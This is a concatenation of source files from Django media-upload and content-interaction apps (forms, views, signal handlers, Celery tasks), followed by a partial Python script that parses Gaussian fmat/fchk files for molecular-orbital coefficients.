FORMS class AttachmentForm(MediaForm): class Meta(MediaForm.Meta): model = Attachment @ajax_file_upload(form_file_field_name="file", content_type="all") class AttachmentAjaxUploadForm(AttachmentForm): pass class ObjectAttachmentForm(ObjectMediaForm): class Meta(ObjectMediaForm.Meta): model = Attachment @ajax_file_upload(form_file_field_name="file", content_type="all") class ObjectAttachmentAjaxUploadForm(ObjectAttachmentForm): pass class AttachmentAdminForm(MediaAdminForm): class Meta: model = Attachment class TagForm(forms.ModelForm): """ Form to add a media tag """ class Meta: model = MediaTag fields = ('name',) class AjaxFileUploadedForm(forms.ModelForm): class Meta: model = AjaxFileUploaded fields = ('file',) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None, content="all"): super(AjaxFileUploadedForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) # setting file validators self.fields['file'].validators.append(FileFieldValidator( mime_types=settings.MEDIA_STATICFILES_FORMATS[content]['types'], max_size=settings.MEDIA_STATICFILES_FORMATS[content]['size'] )) ``` #### File: django-allmedia/media/views.py ```python from django.utils.encoding import force_text from django.views.generic import View, TemplateView from django.utils.translation import ugettext_lazy as _ from django.core.cache import cache from .forms import AjaxFileUploadedForm from .models import YoutubeVideo, YoutubeUploadProgress from .mixins import JSONResponseMixin class HandleAjaxFileUploadedView(JSONResponseMixin, View): def post(self, request, *args, **kwargs): try: content = request.POST.get('content', "all") form = AjaxFileUploadedForm(request.POST, request.FILES, content=content) if form.is_valid(): model = form.save() return self.render_to_response({ 'result': True, 'object_pk': model.pk }) messages = {} for i in xrange(len(form.errors)): item_error_list = form.errors.items()[i][1] for j in xrange(len(item_error_list)): messages.update({j: force_text(item_error_list[j])}) return self.render_to_response({ 'result': False, 'failedMsgs': messages }) except Exception as e: return self.render_to_response({ 'result': False, 'failedMsgs': {1: force_text(_(u"A problem has occurred while trying to save the uploaded file."))} }) class HandleYoutubeProcessingView(JSONResponseMixin, View): def get(self, request, *args, **kwargs): video_id = kwargs['video_id'] try: return self.render_to_response({ 'result': True, 'processed': YoutubeVideo.objects.get(pk=video_id).is_processed }) except YoutubeVideo.DoesNotExist: return self.render_to_response({ 'result': False, 'failedMsgs': {1: force_text(_(u"The video specified with id:%s does not exist.") % video_id)} }) class YoutubeUploadProcessView(TemplateView): def get_context_data(self, **kwargs): context = super(YoutubeUploadProcessView, self).get_context_data(**kwargs) try: if cache: progress = cache.get(self.request.session.session_key) else: progress = YoutubeUploadProgress.objects.get(session_key=self.request.session.session_key) context.update({ 'youtube_upload_status': progress.progress_data if isinstance(progress, YoutubeUploadProgress) else progress }) except YoutubeUploadProgress.DoesNotExist: pass except: pass return context ``` #### File: django-allmedia/test/views.py ```python from django.contrib.contenttypes.models import ContentType from django.http import HttpResponseRedirect from 
django.views.generic import ListView, CreateView, DetailView, UpdateView, TemplateView from media.decorators import use_youtube_api from media.models import YoutubeVideo class ListMediaItem(ListView): context_object_name = 'media' def get_context_data(self, **kwargs): context = super(ListMediaItem, self).get_context_data(**kwargs) context.update({ 'create_url': 'create_%s' % self.model.__name__.lower(), 'create_multi_url': 'create_%s_multi' % self.model.__name__.lower(), 'update_url': 'update_%s' % self.model.__name__.lower(), 'detail_url': 'detail_%s' % self.model.__name__.lower(), 'delete_url': 'delete_%s' % self.model.__name__.lower(), 'detail_multi_url': 'detail_%s_multi' % self.model.__name__.lower(), 'label': self.model.__name__.upper() }) return context class CreateMedia(CreateView): def get_context_data(self, **kwargs): context = super(CreateMedia, self).get_context_data(**kwargs) context.update({ 'list_url': 'list_%s' % self.model.__name__.lower(), }) return context @use_youtube_api(['model']) def form_valid(self, form): """ If the form is valid, save the associated model. """ mock_ct = ContentType.objects.get_for_model(self.request.user) self.object = form.save(commit=False) self.object.content_type = mock_ct self.object.object_pk = self.request.user.pk self.object.save() form.save_m2m() return HttpResponseRedirect(self.get_success_url()) # CreateMedia.form_valid = use_youtube_api(CreateMedia.form_valid, models=['model']) class UpdateMedia(UpdateView): def get_context_data(self, **kwargs): context = super(UpdateMedia, self).get_context_data(**kwargs) context.update({ 'list_url': 'list_%s' % self.model.__name__.lower(), }) return context @use_youtube_api(['model']) def form_valid(self, form): return super(UpdateMedia, self).form_valid(form) class DetailMedia(DetailView): context_object_name = 'media' def get_context_data(self, **kwargs): context = super(DetailMedia, self).get_context_data(**kwargs) context.update({ 'label': self.model.__name__.upper() }) return context #################################################################################### from django.forms.formsets import formset_factory class CreateMultipleYoutubeVideos(CreateView): def __init__(self, **kwargs): super(CreateMultipleYoutubeVideos, self).__init__(**kwargs) self.formset = formset_factory(self.form_class, extra=2) def get_context_data(self, **kwargs): context = super(CreateMultipleYoutubeVideos, self).get_context_data(**kwargs) context.update({'formset': self.formset}) return context def post(self, request, *args, **kwargs): formset = self.formset(request.POST, request.FILES) if formset.is_valid(): return self.form_valid(formset) else: return self.form_invalid(formset) @use_youtube_api(['formset.form.Meta.model']) def form_valid(self, formset): for form in formset: mock_ct = ContentType.objects.get_for_model(self.request.user) object = form.save(commit=False) object.content_type = mock_ct object.object_pk = self.request.user.pk object.save() form.save_m2m() return HttpResponseRedirect(self.success_url) def form_invalid(self, formset): return self.render_to_response(self.get_context_data(formset=formset)) class ShowMultipleYoutubeVideos(TemplateView): def get_context_data(self, **kwargs): context = super(ShowMultipleYoutubeVideos, self).get_context_data(**kwargs) context.update({'youtube_videos': YoutubeVideo.objects.all()}) return context ```
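`CreateMultipleYoutubeVideos` builds its form collection with `formset_factory`. Below is a hedged, self-contained sketch of that formset flow using a hypothetical `CaptionForm` and an in-memory Django configuration; it is not code from the app, only an illustration of the validate-then-iterate pattern the view uses.

```python
import django
from django.conf import settings

# Minimal standalone configuration so the form machinery runs outside a project (sketch only).
if not settings.configured:
    settings.configure(USE_I18N=False)
    django.setup()

from django import forms
from django.forms.formsets import formset_factory

class CaptionForm(forms.Form):                      # hypothetical stand-in for the media forms
    caption = forms.CharField(max_length=100)

CaptionFormSet = formset_factory(CaptionForm, extra=2)
formset = CaptionFormSet({
    "form-TOTAL_FORMS": "2", "form-INITIAL_FORMS": "0",
    "form-0-caption": "first clip", "form-1-caption": "second clip",
})
# CreateMultipleYoutubeVideos.post() applies the same is_valid() gate before saving each child form.
print(formset.is_valid(), [f.cleaned_data for f in formset])
```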
{ "source": "aaboffill/django-content-interactions", "score": 2 }
#### File: django-content-interactions/content_interactions/forms.py ```python import time from django import forms from django.conf import settings from django.contrib.auth.models import User from django.contrib.contenttypes.models import ContentType from django.contrib.sites.models import Site from django.core.exceptions import ValidationError, ImproperlyConfigured from django.utils.crypto import salted_hmac, constant_time_compare from django.utils.encoding import force_str from django.forms.util import ErrorList, ErrorDict from django.utils.translation import ugettext_lazy as _, ungettext, ugettext from django.utils.text import get_text_list from models import Comment class ShareForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.IntegerField(widget=forms.HiddenInput()) user = forms.ModelChoiceField(User.objects.all(), widget=forms.HiddenInput()) addressee = forms.CharField(max_length=5000, required=False) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def clean_addressee(self): addressee = self.cleaned_data.get('addressee', "") self.addressee_list = addressee.split(',') if addressee != "" else [] return addressee def clean(self): cleaned_data = super(ShareForm, self).clean() self.content_object = cleaned_data['content_type'].get_object_for_this_type(pk=cleaned_data['object_pk']) return cleaned_data def share(self): from signals import item_shared if self.addressee_list: item_shared.send( self.content_object.__class__, instance=self.content_object, user=self.cleaned_data['user'], addressee_list=self.addressee_list, comment=self.cleaned_data['comment'] ) class RateForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.CharField(widget=forms.HiddenInput()) rating = forms.IntegerField(widget=forms.HiddenInput(), min_value=1, max_value=5) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(RateForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) self.user = initial.get('user', None) def save_rating(self): obj = self.cleaned_data['content_type'].get_object_for_this_type( **{'pk': self.cleaned_data['object_pk']} ) if obj.rated_by(self.user): obj.change_rate(self.user, self.cleaned_data['rating'], self.cleaned_data['comment']) else: obj.save_rate(self.user, self.cleaned_data['rating'], self.cleaned_data['comment']) class DenounceForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput()) object_pk = forms.CharField(widget=forms.HiddenInput()) comment = forms.CharField(max_length=500, widget=forms.Textarea(attrs={'rows': 4}), required=False) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(DenounceForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) self.user = initial.get('user', None) def clean(self): self.obj = self.cleaned_data['content_type'].get_object_for_this_type( **{'pk': self.cleaned_data['object_pk']} ) if not self.obj.denounced_by(self.user) and not self.cleaned_data.get('comment', None): self._errors['comment'] = 
self.error_class(["This file is required."]) return self.cleaned_data def save_denounce(self): if not self.obj.denounced_by(self.user): self.obj.denounce(self.user, self.cleaned_data['comment']) return True else: self.obj.remove_denounce(self.user) return False DEFAULT_COMMENTS_TIMEOUT = getattr(settings, 'COMMENTS_TIMEOUT', (2 * 60 * 60)) class CommentForm(forms.ModelForm): timestamp = forms.IntegerField(widget=forms.HiddenInput) security_hash = forms.CharField(min_length=40, max_length=40, widget=forms.HiddenInput) honeypot = forms.CharField( required=False, label=_('If you enter anything in this field your comment will be treated as spam') ) class Meta(object): model = Comment fields = ('content_type', 'object_pk', 'site', 'user', 'user_name', 'user_email', 'comment', 'answer_to') widgets = { 'content_type': forms.HiddenInput(), 'object_pk': forms.HiddenInput(), 'site': forms.HiddenInput(), 'user': forms.HiddenInput(), 'answer_to': forms.HiddenInput(), } def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False, instance=None): if not instance: self._initial_validate(initial) initial.update(self._generate_security_data(instance or initial)) super(CommentForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted, instance) def _initial_validate(self, initial): if not 'content_type' in initial: raise ImproperlyConfigured( 'Expect "content_type" within initial to initialize content_interactions.forms.CommentForm.' ) if not 'object_pk' in initial: raise ImproperlyConfigured( 'Expect "object_pk" within initial to initialize content_interactions.forms.CommentForm.' ) def _generate_security_data(self, content): """Generate a dict of security data for "initial" data.""" content_type = str(content.content_type.pk if isinstance(content, Comment) else content.get('content_type').pk) object_pk = str(content.object_pk if isinstance(content, Comment) else content.get('object_pk')) timestamp = str(int(time.time())) security_dict = { 'timestamp': timestamp, 'security_hash': self._generate_security_hash(content_type, object_pk, timestamp) } return security_dict def _generate_security_hash(self, content_type, object_pk, timestamp): """ Generate a HMAC security hash from the provided info. """ return salted_hmac( key_salt="content_interactions.forms.CommentForm", value="-".join([content_type, object_pk, timestamp]) ).hexdigest() def clean_comment(self): """ If COMMENTS_ALLOW_PROFANITIES is False, check that the comment doesn't contain anything in PROFANITIES_LIST. """ comment = self.cleaned_data["comment"] if (not getattr(settings, 'COMMENTS_ALLOW_PROFANITIES', False) and getattr(settings, 'PROFANITIES_LIST', False)): bad_words = [w for w in settings.PROFANITIES_LIST if w in comment.lower()] if bad_words: raise forms.ValidationError(ungettext( "Watch your mouth! The word %s is not allowed here.", "Watch your mouth! 
The words %s are not allowed here.", len(bad_words)) % get_text_list( ['"%s%s%s"' % (i[0], '-' * (len(i) - 2), i[-1]) for i in bad_words], ugettext('and'))) return comment def clean_security_hash(self): """Check the security hash.""" security_hash_dict = { 'content_type': self.data.get("content_type", ""), 'object_pk': self.data.get("object_pk", ""), 'timestamp': self.data.get("timestamp", ""), } expected_hash = self._generate_security_hash(**security_hash_dict) actual_hash = self.cleaned_data["security_hash"] if not constant_time_compare(expected_hash, actual_hash): raise forms.ValidationError(_(u"Security hash check failed.")) return actual_hash def clean_timestamp(self): """Make sure the timestamp isn't too far (default is > 2 hours) in the past.""" timestamp = self.cleaned_data["timestamp"] if time.time() - timestamp > DEFAULT_COMMENTS_TIMEOUT: raise forms.ValidationError(_(u"Timestamp check failed")) return timestamp def clean_honeypot(self): """Check that nothing's been entered into the honeypot.""" value = self.cleaned_data["honeypot"] if value: raise forms.ValidationError(self.fields["honeypot"].label) return value def clean_user_name(self): value = self.cleaned_data['user_name'] if not value and not self.cleaned_data['user']: raise forms.ValidationError(_(u"This field is required.")) return value def clean_user_email(self): value = self.cleaned_data['user_email'] if not value and not self.cleaned_data['user']: raise forms.ValidationError(_(u"This field is required.")) return value try: from social_publisher.models import SocialNetwork from social_publisher.provider import ActionMessageProvider, MessageProvider from social_publisher.utils import social_networks_by_user, CONTENT_CLASS from tasks import social_networks_publish_action_message, social_networks_publish_message class ShareSocialNetworkForm(forms.Form): content_type = forms.ModelChoiceField(ContentType.objects.all(), widget=forms.HiddenInput(), required=False) object_pk = forms.IntegerField(widget=forms.HiddenInput(), required=False) user = forms.ModelChoiceField(User.objects.all(), widget=forms.HiddenInput()) social_networks = forms.MultipleChoiceField( choices=[], required=False, label=_(u'Social Networks'), help_text=_(u"Select Social Networks") ) comment = forms.CharField( max_length=500, widget=forms.Textarea(attrs={'rows': 2}), required=False, help_text=_(u"Type a comment for your publication.") ) action = forms.CharField(max_length=50, required=False, widget=forms.HiddenInput()) verb = forms.CharField(max_length=50, required=False, widget=forms.HiddenInput()) provider_type = forms.CharField(max_length=50, widget=forms.HiddenInput()) def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None, initial=None, error_class=ErrorList, label_suffix=None, empty_permitted=False): super(ShareSocialNetworkForm, self).__init__(data, files, auto_id, prefix, initial, error_class, label_suffix, empty_permitted) if initial: if 'social_networks' in initial and initial['social_networks'] and isinstance( initial['social_networks'], (list, set, tuple) ): self.initial['social_networks'] = [sn.pk for sn in initial['social_networks']] if 'user' not in initial or not initial['user']: raise ImproperlyConfigured("The user must be defined in the initial content.") if not isinstance(initial['user'], User): raise ImproperlyConfigured("The user must be an instance of django User.") if 'provider_type' not in initial or not initial['provider_type']: raise ImproperlyConfigured("The provider_type must be defined in the initial content.") 
self.fields['social_networks'].choices = self.fields['social_networks'].choices + [ (sn.pk, sn.name) for sn in social_networks_by_user(initial['user'], initial['provider_type']) ] if data: user_key = self.prefix + '-user' if self.prefix else 'user' provider_type_key = self.prefix + '-provider_type' if self.prefix else 'provider_type' if data[user_key] and data[provider_type_key]: self.fields['social_networks'].choices = self.fields['social_networks'].choices + [ (sn.pk, sn.name) for sn in social_networks_by_user( User.objects.get(pk=data[user_key]), force_str(data[provider_type_key]) ) ] def clean(self): cleaned_data = super(ShareSocialNetworkForm, self).clean() if ('comment' in cleaned_data and (not cleaned_data['comment'] or cleaned_data['comment'] == "")) and cleaned_data['social_networks']: self._errors['social_networks'] = self.error_class( [_(u"You must type a comment to post in (%s).") % ' ,'.join([sn.name for sn in SocialNetwork.objects.filter(pk__in=cleaned_data['social_networks'])])] ) if cleaned_data['provider_type'] and CONTENT_CLASS[cleaned_data['provider_type']] == ActionMessageProvider: if not cleaned_data['action'] or cleaned_data['action'] == "": self._errors['action'] = self.error_class([_(u"This field is required.")]) if not cleaned_data['verb'] or cleaned_data['verb'] == "": self._errors['verb'] = self.error_class([_(u"This field is required.")]) if cleaned_data['content_type'] and cleaned_data['object_pk']: self.content_object = cleaned_data['content_type'].get_object_for_this_type(pk=cleaned_data['object_pk']) return cleaned_data def share(self, content_object=None): comment = self.cleaned_data.get('comment', None) social_networks = self.cleaned_data.get('social_networks', None) content_object = content_object or self.content_object if comment and comment != "" and social_networks and social_networks and content_object: site_pk = Site.objects.get_current().pk content_type = self.cleaned_data['content_type'] or ContentType.objects.get_for_model(content_object) if (CONTENT_CLASS[self.cleaned_data['provider_type']] == ActionMessageProvider): social_networks_publish_action_message.delay( message=comment, content_type_pk=content_type.pk, object_pk=content_object.pk, user_pk=self.cleaned_data['user'].pk, site_pk=site_pk, social_network_ids=social_networks, action=self.cleaned_data['action'], verb=self.cleaned_data['verb'] ) elif (CONTENT_CLASS[self.cleaned_data['provider_type']] == MessageProvider): social_networks_publish_message.delay( message=comment, content_type_pk=content_type.pk, object_pk=content_object.pk, user_pk=self.cleaned_data['user'].pk, site_pk=site_pk, social_network_ids=social_networks, ) except ImportError: pass ``` #### File: django-content-interactions/content_interactions_stats/handlers.py ```python from django.contrib.contenttypes.models import ContentType from settings import ( CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY, CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY, CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY, CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY, CONTENT_INTERACTIONS_SHARE_PROCESSING_DELAY, CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY, CONTENT_INTERACTIONS_VISIT_PROCESSING_DELAY, ) # noinspection PyUnresolvedReferences,PyUnusedLocal def like_handler(instance, **kwargs): if CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY: try: from tasks import item_like_process item_like_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_like_process as sync_item_like_process 
sync_item_like_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def dislike_handler(instance, **kwargs): if CONTENT_INTERACTIONS_LIKE_PROCESSING_DELAY: try: from tasks import item_dislike_process item_dislike_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_dislike_process as sync_item_dislike_process sync_item_dislike_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def new_rating_handler(instance, rating, **kwargs): if CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY: try: from tasks import item_new_rating_process item_new_rating_process.delay(instance.pk, ContentType.objects.get_for_model(instance), rating) return except ImportError: pass from utils import item_new_rating_process as sync_item_new_rating_process sync_item_new_rating_process(instance.pk, ContentType.objects.get_for_model(instance), rating) # noinspection PyUnresolvedReferences,PyUnusedLocal def updated_rating_handler(instance, rating, old_rating, **kwargs): if CONTENT_INTERACTIONS_RATE_PROCESSING_DELAY: try: from tasks import item_updated_rating_process item_updated_rating_process.delay( instance.pk, ContentType.objects.get_for_model(instance), old_rating, rating ) return except ImportError: pass from utils import item_updated_rating_process as sync_item_updated_rating_process sync_item_updated_rating_process(instance.pk, ContentType.objects.get_for_model(instance), old_rating, rating) # noinspection PyUnresolvedReferences,PyUnusedLocal def update_cached_rating(instance, **kwargs): instance.rating = ( 5 * instance.rating_5_count + 4 * instance.rating_4_count + 3 * instance.rating_3_count + 2 * instance.rating_2_count + instance.rating_1_count )/(instance.ratings * float(1)) if instance.ratings else 0 return instance # noinspection PyUnresolvedReferences,PyUnusedLocal def favorite_mark_handler(instance, **kwargs): if CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY: try: from tasks import item_marked_favorite_process item_marked_favorite_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_marked_favorite_process as sync_item_marked_favorite_process sync_item_marked_favorite_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def favorite_unmark_handler(instance, **kwargs): if CONTENT_INTERACTIONS_FAVORITE_PROCESSING_DELAY: try: from tasks import item_unmarked_favorite_process item_unmarked_favorite_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_unmarked_favorite_process as sync_item_unmarked_favorite_process sync_item_unmarked_favorite_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def denounce_handler(instance, **kwargs): if CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY: try: from tasks import item_denounced_process item_denounced_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_denounced_process as sync_item_denounced_process sync_item_denounced_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def denounce_remove_handler(instance, **kwargs): if 
CONTENT_INTERACTIONS_DENOUNCE_PROCESSING_DELAY: try: from tasks import item_denounce_removed_process item_denounce_removed_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_denounce_removed_process as sync_item_denounce_removed_process sync_item_denounce_removed_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def share_handler(instance, **kwargs): if CONTENT_INTERACTIONS_SHARE_PROCESSING_DELAY: try: from tasks import item_shared_process item_shared_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_shared_process as sync_item_shared_process sync_item_shared_process(instance.pk, ContentType.objects.get_for_model(instance)) # noinspection PyUnresolvedReferences,PyUnusedLocal def comment_handler(instance, user, answer_to, **kwargs): commented_item = instance.content_object if CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY: try: from tasks import item_got_comment_process item_got_comment_process.delay(commented_item.pk, ContentType.objects.get_for_model(commented_item)) return except ImportError: pass from utils import item_got_comment_process as sync_item_got_comment_process sync_item_got_comment_process(commented_item.pk, ContentType.objects.get_for_model(commented_item)) # noinspection PyUnresolvedReferences,PyUnusedLocal def comment_deleted_handler(instance, **kwargs): commented_item = instance.content_object if CONTENT_INTERACTIONS_COMMENT_PROCESSING_DELAY: try: from tasks import item_comment_deleted_process item_comment_deleted_process.delay(commented_item.pk, ContentType.objects.get_for_model(commented_item)) return except ImportError: pass from utils import item_comment_deleted_process as sync_item_comment_deleted_process sync_item_comment_deleted_process(commented_item.pk, ContentType.objects.get_for_model(commented_item)) # noinspection PyUnresolvedReferences,PyUnusedLocal def visit_handler(instance, **kwargs): if CONTENT_INTERACTIONS_VISIT_PROCESSING_DELAY: try: from tasks import item_visited_process item_visited_process.delay(instance.pk, ContentType.objects.get_for_model(instance)) return except ImportError: pass from utils import item_visited_process as sync_item_visited_process sync_item_visited_process(instance.pk, ContentType.objects.get_for_model(instance)) ``` #### File: django-content-interactions/content_interactions_stats/tasks.py ```python from celery import shared_task @shared_task(name='content_interactions.like_process') def item_like_process(item_id, item_content_type): from content_interactions_stats.utils import item_like_process item_like_process(item_id, item_content_type) @shared_task(name='content_interactions.dislike_process') def item_dislike_process(item_id, item_content_type): from content_interactions_stats.utils import item_dislike_process item_dislike_process(item_id, item_content_type) @shared_task(name='content_interactions.new_rating_process') def item_new_rating_process(item_id, item_content_type, rating): from content_interactions_stats.utils import item_new_rating_process item_new_rating_process(item_id, item_content_type, rating) @shared_task(name='content_interactions.update_rating_process') def item_updated_rating_process(item_id, item_content_type, old_rating, rating): from content_interactions_stats.utils import item_updated_rating_process item_updated_rating_process(item_id, item_content_type, old_rating, rating) 
@shared_task(name='content_interactions.mark_favorite_process') def item_marked_favorite_process(item_id, item_content_type): from content_interactions_stats.utils import item_marked_favorite_process item_marked_favorite_process(item_id, item_content_type) @shared_task(name='content_interactions.unmark_favorite_process') def item_unmarked_favorite_process(item_id, item_content_type): from content_interactions_stats.utils import item_unmarked_favorite_process item_unmarked_favorite_process(item_id, item_content_type) @shared_task(name='content_interactions.share_process') def item_shared_process(item_id, item_content_type): from content_interactions_stats.utils import item_shared_process item_shared_process(item_id, item_content_type) @shared_task(name='content_interactions.denounce_process') def item_denounced_process(item_id, item_content_type): from content_interactions_stats.utils import item_denounced_process item_denounced_process(item_id, item_content_type) @shared_task(name='content_interactions.denounce_removed_process') def item_denounce_removed_process(item_id, item_content_type): from content_interactions_stats.utils import item_denounce_removed_process item_denounce_removed_process(item_id, item_content_type) @shared_task(name='content_interactions.comment_process') def item_got_comment_process(item_id, item_content_type): from content_interactions_stats.utils import item_got_comment_process item_got_comment_process(item_id, item_content_type) @shared_task(name='content_interactions.comment_deleted_process') def item_comment_deleted_process(item_id, item_content_type): from content_interactions_stats.utils import item_comment_deleted_process item_comment_deleted_process(item_id, item_content_type) @shared_task(name='content_interactions.visit_process') def item_visited_process(item_id, item_content_type): from content_interactions_stats.utils import item_visited_process item_visited_process(item_id, item_content_type) ```
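Every handler above follows the same dispatch shape: if delayed processing is enabled, try the Celery task and fall back to the synchronous util on ImportError. Here is a compact standalone sketch of that pattern; the module and function names are hypothetical.

```python
PROCESSING_DELAY = True   # stands in for a CONTENT_INTERACTIONS_*_PROCESSING_DELAY setting

def like_stat_sync(item_id, content_type):
    # Synchronous fallback, analogous to the functions imported from utils above.
    print("processed inline:", item_id, content_type)

def dispatch_like(item_id, content_type):
    if PROCESSING_DELAY:
        try:
            from myapp.tasks import item_like_process   # hypothetical Celery task module
            item_like_process.delay(item_id, content_type)
            return
        except ImportError:
            pass                                        # Celery path unavailable: fall through
    like_stat_sync(item_id, content_type)

dispatch_like(42, "article")
```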
{ "source": "aaboutaka/Data-Extraction-Codes", "score": 3 }
#### File: aaboutaka/Data-Extraction-Codes/SVD-MOOvlp.py
```python
import math
import cmath
import numpy as np
np.set_printoptions(suppress=True)
from numpy import array
from numpy import diag
from numpy import dot
from numpy import zeros
import sys

##########
if len(sys.argv) < 5 or len(sys.argv) > 5:
    print('You need 5 arguments: name of the file, 1st filename, "1/-1 for Alpha or Beta"'
          ', 2nd filename, and "1/-1 for Alpha or Beta"')
    sys.exit(0)
####


# This function will grab NBasis
def NBasGrab(filename):
    NBasis = 0
    with open(filename, 'r') as f:
        if filename.endswith('.fmat'):
            for line in f:
                if "NBasis" in line:
                    words = line.split()
                    for i in words:
                        NBasis = int(words[3])
        elif filename.endswith('.fchk'):
            for line in f:
                if "Number of basis functions" in line:
                    words = line.split()
                    NBasis = int(words[5])
                    # print (NBasis)
        else:
            print('The file extension is not supported. This script only supports fchk and fmat.')
    return NBasis


# This function will grab the Alpha or Beta MO Matrix
def MatGrab(filename, switch):
    # Get number of basis functions
    NBasis = NBasGrab(filename)
    #################################
    with open(filename, 'r') as f:
        # FMAT FILES
        if filename.endswith('.fmat'):
            # Initializing variables for fmat file
            Exlines = int(math.ceil(NBasis/5))
            MOlines = int(Exlines + (NBasis*Exlines))
            MOlista = []
            MOlistb = []
            MOFull = []
            MOA = []
            MOB = []
            if (switch == 1):
                # Extract Alpha MO coefficient
                for line in f:
                    if "ALPHA MO COEFFICIENTS" in line:
                        for m in range(0, MOlines):
                            nextline = next(f)
                            nextline = nextline.split()
                            MOlista.append(nextline)
                        # Clean header rows and columns
                        for n in range(0, len(MOlista)-Exlines, NBasis):
                            del MOlista[n]
                        for n in range(len(MOlista)):
                            del MOlista[n][0]
                        # For NBasis > 5, the matrix is stored in chunks. temp is equal to the number of chunks.
                        temp = int((len(MOlista)/NBasis))
                        #
                        # Create a copy of the first chunk of the matrix which is equal to NBasis.
                        # Start filling the empty list "MOFull"
                        for i in range(0, NBasis):
                            MOFull.append(MOlista[i])
                        #
                        # "Extend" the list "MOFull" by the chunks left to match the NBasis x NBasis matrix
                        for k in range(1, temp+1):
                            for j in range(0, NBasis):
                                for i in range(len(MOlista)):
                                    if i == j + (NBasis*k):
                                        MOFull[j].extend(MOlista[i])
                        # Concatenate the list into one array
                        ConcMOFull = np.array(np.concatenate([np.array(i) for i in MOFull]))
                        # Create another list to "float" all the elements
                        for item in ConcMOFull:
                            MOA.append(float(item))
                        # Reshape the matrix into NBasis by NBasis
                        MOCoeffA = np.reshape(MOA, (NBasis, NBasis))
                        # Return MOCoeffA
                        return MOCoeffA
            #
            elif (switch == -1):
                # Extract Beta MO coefficient
                for line in f:
                    if "BETA MO COEFFICIENTS" in line:
                        for m in range(0, MOlines):
                            nextline = next(f)
                            nextline = nextline.split()
                            MOlistb.append(nextline)
                        # Clean header rows and columns
                        for n in range(0, len(MOlistb)-Exlines, NBasis):
                            del MOlistb[n]
                        for n in range(len(MOlistb)):
                            del MOlistb[n][0]
                        # For NBasis > 5, the matrix is stored in chunks. temp is equal to the number of chunks.
                        temp = int((len(MOlistb)/NBasis))
                        #
                        # Create a copy of the first chunk of the matrix which is equal to NBasis.
                        # Start filling the empty list "MOFull"
                        for i in range(0, NBasis):
                            MOFull.append(MOlistb[i])
                        #
                        # "Extend" the list "MOFull" by the chunks left to match the NBasis x NBasis matrix
                        for k in range(1, temp+1):
                            for j in range(0, NBasis):
                                for i in range(len(MOlistb)):
                                    if i == j + (NBasis*k):
                                        MOFull[j].extend(MOlistb[i])
                        # Concatenate the list into one array
                        ConcMOFull = np.array(np.concatenate([np.array(i) for i in MOFull]))
                        # Create another list to "float" all the elements
                        for item in ConcMOFull:
                            MOB.append(float(item))
                        # Reshape the matrix into NBasis by NBasis
                        MOCoeffB = np.reshape(MOB, (NBasis, NBasis))
                        #
                        return MOCoeffB
        ######################################################################################################################
        ######################################################################################################################
        # FCHK FILES
        elif filename.endswith('.fchk'):
            MOElements = NBasis * NBasis
            MOlines = int(MOElements/5) + 1
            MOlista = []
            MOlistb = []
            MOA = []
            MOB = []
            if (NBasis % 5 == 0):
                MOlines = MOlines - 1
            # Extract Alpha MO coefficient
            if (switch == 1):
                with open(filename, 'r') as f:
                    for line in f:
                        if "Alpha MO coefficients" in line:
                            for m in range(0, MOlines):
                                nextline = next(f)
                                nextline = nextline.split()
                                # print(nextline)
                                MOlista.extend((nextline))
                            # Convert the items in the list to float
                            for i in MOlista:
                                MOA.append(float(i))
                            # print(MOA)
                            # Reshape the array into NBasis by NBasis matrix
                            MOCoeffA = np.reshape(np.array(MOA), (NBasis, NBasis), order='F')
                            # print(MOCoeffA)
